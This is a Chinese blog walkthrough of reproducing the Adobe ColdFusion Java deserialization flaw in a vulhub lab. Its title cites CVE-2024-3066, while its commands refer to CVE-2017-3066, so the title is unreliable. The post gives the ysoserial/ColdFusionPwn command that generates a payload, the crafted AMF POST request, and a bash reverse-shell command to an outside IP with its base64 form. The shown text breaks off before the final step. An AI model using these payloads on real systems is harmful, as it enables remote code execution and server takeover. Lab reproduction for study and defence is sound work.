10 - vulhub - Adobe ColdFusion 反序列化漏洞 (CVE-2024-3066)

最新推荐文章于 2024-11-22 17:37:42 发布
最新推荐文章于 2024-11-22 17:37:42 发布
阅读量849 收藏 6
点赞数 17
文章标签: adobe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_87214877/article/details/142341206
版权

影响版本

Adobe ColdFusion (2016 release) Update 3及之前的版本

ColdFusion 11 Update 11及之前的版本

ColdFusion 10 Update 22及之前的版本

漏洞原理

Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。

漏洞复现

环境准备

靶机环境 139.196.87.102 (vulhub)

攻击机环境 192.168.8.137 (虚拟机 Ubuntu 20、Java1.8、Burp)

启动 Adobe ColdFusion 反序列化漏洞 环境

1.进入 vulhub 的 Adobe ColdFusion 路径

cd /usr/local/tools/vulhub/coldfusion/CVE-2017-3066

2.编译并启动环境

docker-compose up -d

3.查看环境运行状态

docker ps | grep vulhub

在这里插入图片描述

访问 “http://139.196.87.102:8500/CFIDE/administrator/index.cfm”,输入密码 “vulhub” 完成安装

在这里插入图片描述

在这里插入图片描述

漏洞利用

我们需要使用ColdFusionPwn工具来生成POC:

https://github.com/codewhitesec/ColdFusionPwn/releases/tag/0.0.1

https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar

生成POC命令如下

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-d367e379d9-1.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser

会在两个jar包当前所在目录生成一个 poc.ser 文件

在这里插入图片描述

访问 http://your-ip:8500/flex2gateway/amf,并抓包将 Content-Type 改为application/x-amf,修改为 POST 协议,并添加刚刚生成的 poc.ser 文件

POST /flex2gateway/amf HTTP/1.1

Host: 139.196.87.102:8500

Accept-Encoding: gzip, deflate

Accept: /

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-amf

Content-Length: 2853

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

nice 老铁!利用成功!

尝试反弹shell

同时我们试一下,利用该漏洞反弹shell

构造反弹命令

bash -i >& /dev/tcp/47.98.192.99/7777 0>&1

将其进行 base64 编码

YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45OC4xOTIuOTkvNzc3NyAwPiYxIA==

使用 ColdFusionPwn 工具再次生成 poc.ser

2401_87214877
关注
Adobe ColdFusion 反序列化漏洞复现(CVE-2023-38203)
0xSec
01-27 1062
Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。
利用Vulnhub复现漏洞 - Adobe ColdFusion 文件读取漏洞CVE-2010-2861)
JiangBuLiu的博客
06-28 1004
Adobe ColdFusion 文件读取漏洞CVE-2010-2861)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/coldfusion/CVE-2010-2861/ 漏洞原理 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(Cold...
vulhubAdobe ColdFusion 反序列化漏洞CVE-2017-3066)和CVE-2010-2861文件包含漏洞
qq_45300786的博客
09-13 380
adobe coldfusion特征 1、8500端口 2、如图所示 验证和反弹shell都有 https://idc.wanyunshuju.com/aqld/2076.html
vulhub漏洞复现系列之Adobe ColdFusioncve-2010-2861文件读取漏洞CVE-2017-3066反序列化漏洞
weixin_43071873的博客
12-10 1087
CVE-2010-2861)Adobe ColdFusion 文件读取漏洞 一、漏洞简介 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 二、漏洞影响 Adobe ColdFusion 8 Adobe ColdFusion 9 三、漏洞复现 直接访问http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,即可
Adobe ColdFusion反序列化漏洞(cve-2017-3066)
山兔的博客
08-03 685
Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。
vulhub学习笔记-Adobe ColdFusion 文件读取漏洞
ploto_cs的博客
09-11 675
Adobe ColdFusion 文件读取漏洞 一.漏洞介绍 (一)编号 CVE-2010-2861 (二)概述 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 (三)影响版本 Adobe ColdFusion 8、9版本 二.操作步骤 (一)Vulhub i
漏洞复现-Adobe ColdFusion 反序列化漏洞CVE-2023-29300)
玄道的网安博客
08-11 1737
对于 ColdFusion 来说,WDDX 中的每个元素都是一个WddxElement,不同的元素对应着不同的Handler处理类,例如标签中的元素与属性将由StringHandler处理,标签会由StructHandler处理。分析findAttribute()方法可知,参数为url.xxx表示从请求的 URL 中获取xxx的参数值,form.yyy表示从上传的表单中获取yyy的参数值。.wddx.DeserializerWorker.java文件中的显着变化。
10 - vulhub - Adobe ColdFusion 反序列化漏洞 (CVE-2024-3066)(1)
m0_58269070的博客
05-15 689
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
Adobe ColdFusion 反序列化漏洞CVE-2017-3066
DaWan
04-13 592
Adobe ColdFusion 反序列化漏洞CVE-2017-3066)环境搭建漏洞利用反弹shell 环境搭建 使用vulhub进行环境搭建,具体步骤可参考这里。 漏洞利用 环境启动成功,访问http://192.168.36.128:8500/CFIDE/administrator/index.cfm,输入密码vulhub,即可成功安装Adobe ColdFusion 输入密码后,点击OK,页面如下: 需下载内容 ColdFusionPwn-0.0.1-SNAPSHOT-all.j
CVE-2017-3066(Adobe ColdFusion 反序列化漏洞)
G_Fu_Q的博客
04-08 1546
本文仅做漏洞复现记录与实现,请勿用于非法用途 漏洞介绍: Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。 Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。 以下版本受
2024年Python函数定义-位置参数-返回值_定义函数返回元素定位的内容,2024年最新2024年阿里Python高级面试题分享
m0_63102527的博客
05-03 167
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
10 - vulhub - Adobe ColdFusion 反序列化漏洞 (CVE-2017-3066)
最新发布
2401_89082811的博客
11-22 928
ColdFusion 10 Update 22及之前的版本。
漏洞分析|Adobe ColdFusion WDDX 序列化漏洞利用
m0_46699477的博客
09-07 523
本文将分享继 CVE-2023-29300 之后的不出网利用方式,提出 C3P0 和 JGroups 两条基于服务错误部署的新利用链。现 Goby 中实现了 C3P0 和 JGroups 利用链的完整利用,完全支持命令执行以及结果回显功能。
dobe ColdFusion AMF 反序列化远程命令执行 (CVE-2017-3066)
zzzzz1284的博客
01-04 364
CVE-2017-3066
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值